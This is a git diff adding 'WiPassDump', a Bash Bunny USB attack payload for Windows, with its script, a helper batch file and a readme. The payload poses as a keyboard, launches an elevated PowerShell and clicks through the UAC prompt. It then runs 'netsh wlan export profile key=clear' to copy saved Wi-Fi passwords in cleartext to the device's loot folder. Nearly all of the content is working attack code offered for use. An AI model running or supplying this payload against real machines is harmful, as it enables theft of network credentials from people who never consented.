diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd new file mode 100644 index 0000000..858b01e --- /dev/null +++ b/payloads/library/WiPassDump/a.cmd @@ -0,0 +1,6 @@ +REM Go to dump directory +cd /d %~dp0 +cd ../../loot/WiPassDump/ + +REM Dump saved Wi-Fi infos +netsh wlan export profile key=clear \ No newline at end of file diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt new file mode 100644 index 0000000..c141d94 --- /dev/null +++ b/payloads/library/WiPassDump/payload.txt @@ -0,0 +1,56 @@ +#!/bin/bash +# +# Title: WiPassDump +# Author: samdeg555 +# Version: 1.0 +# Target: Windows +# +# Runs powershell as Administrator +# Bypasses UAC +# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny +# + +LED R 200 + +# Create directory to dump infos +mkdir -p /root/udisk/loot/WiPassDump + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +# Set language accordingly +Q SET_LANGUAGE ca + +ATTACKMODE HID STORAGE + +LED B 200 + +# Launch powershell as admin +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell -Verb runAs +Q ENTER + +# Bypass UAC +Q DELAY 3000 +Q ALT o +Q ENTER +Q DELAY 500 + +# Start a.cmd +Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' +Q STRING $SWITCH_POSITION +Q STRING '/a.cmd'"'"')' +Q ENTER + +# Wait for a.cmd to finish and exit + +LED R B 500 + +Q DELAY 3000 +Q STRING exit +Q ENTER + +sync + +LED G diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md new file mode 100644 index 0000000..72412ab --- /dev/null +++ b/payloads/library/WiPassDump/readme.md @@ -0,0 +1,26 @@ +# WiPassDump for Bash Bunnys + +* Author: samdeg555 +* Version: Version 1.0 +* Target: Windows + +## Description + +Dumps saved Wi-Fi infos including clear text passwords to the bash bunny +Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Setting up | +| Blue (blinking) | Attack running | +| Purple (blinking) | Almost done (cleaning up) | +| Green | Attack Complete | + +## Discussion +None yet.